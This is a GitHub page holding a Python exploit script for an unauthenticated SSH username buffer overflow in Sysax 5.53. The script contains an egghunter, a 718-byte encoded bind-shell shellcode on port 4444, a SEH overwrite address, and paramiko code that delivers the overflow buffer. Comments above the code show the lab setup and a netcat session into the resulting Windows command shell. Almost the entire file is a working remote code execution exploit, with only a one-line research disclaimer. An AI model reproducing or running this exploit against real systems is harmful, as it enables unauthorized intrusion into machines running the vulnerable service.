-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-sysax.py
120 lines (111 loc) · 5.85 KB
/
exploit-sysax.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/usr/bin/python
#
# October 2017 | github.com/rafaveira3
#
# Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated (Using Egghunter)
#
# How I tested it:
# - Windows XP SP3 and Kali.
# - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - https://www.exploit-db.com/apps/bac43012f5bd4d3092c1153b52ed3301-sysaxserv_setup5.53.msi
#
# PoC:
# Windows XP:
# - Install Sysax 5.53 (next -> next -> finish)
# - Setup SSH service: "Manage Server Settings -> Configure -> Check first box"
# - Open cmd.exe and type : netstat -ano | find ":4444"
# Kali:
# root@kali:~# pip install paramiko
# root@kali:~# nc -nv 10.10.0.20 4444
# (UNKNOWN) [10.10.0.20] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
#
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
# Infos:
# - pattern_create + pattern_offset = 9208
# - pop pop ret found using mona at 0x5d9227fc of RPCNS4.dll (SafeSEH: False)
# - jmp back 128 bytes = \xEB\x80
# - egghunter generated with mona (egg r4f4)
# - shellcode generated with msfvenom
import paramiko,os,sys
host = "10.10.0.20"
port = 22
# Size 32 Bytes
# Egg = r4f4
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
# Size = 718 bytes
shellcode = ""
shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f"
shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75"
shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e"
shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b"
shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55"
shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42"
shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59"
shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32"
shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52"
shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31"
shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53"
shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54"
shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b"
shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70"
shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51"
shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38"
shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52"
shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b"
shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66"
shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a"
shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c"
shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33"
shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36"
shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66"
shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63"
shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38"
shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73"
shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70"
shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49"
shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52"
shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36"
shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77"
shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a"
shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78"
shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43"
shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31"
shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53"
shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71"
shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69"
shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51"
shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35"
shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36"
shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42"
shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f"
shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39"
shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30"
shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31"
shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f"
shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b"
shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53"
shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39"
shellcode += "\x45\x41\x41"
buff = "A"*8972 + "\x90"*150 + egghunter + "\x90"*50 + "B"*2 + "\xEB\x80" + "\xFC\x27\x92\x5d" + "r4f4r4f4" + shellcode
print "[+] Launching exploit..."
try:
transport = paramiko.Transport((host, port))
except:
print "[X] Unable to connect to " + host + " on port " + str(port)
sys.exit(1)
transport = paramiko.Transport((host, port))
transport.connect(username = buff, password = "rafael")
transport.close()
print "[+] Done!"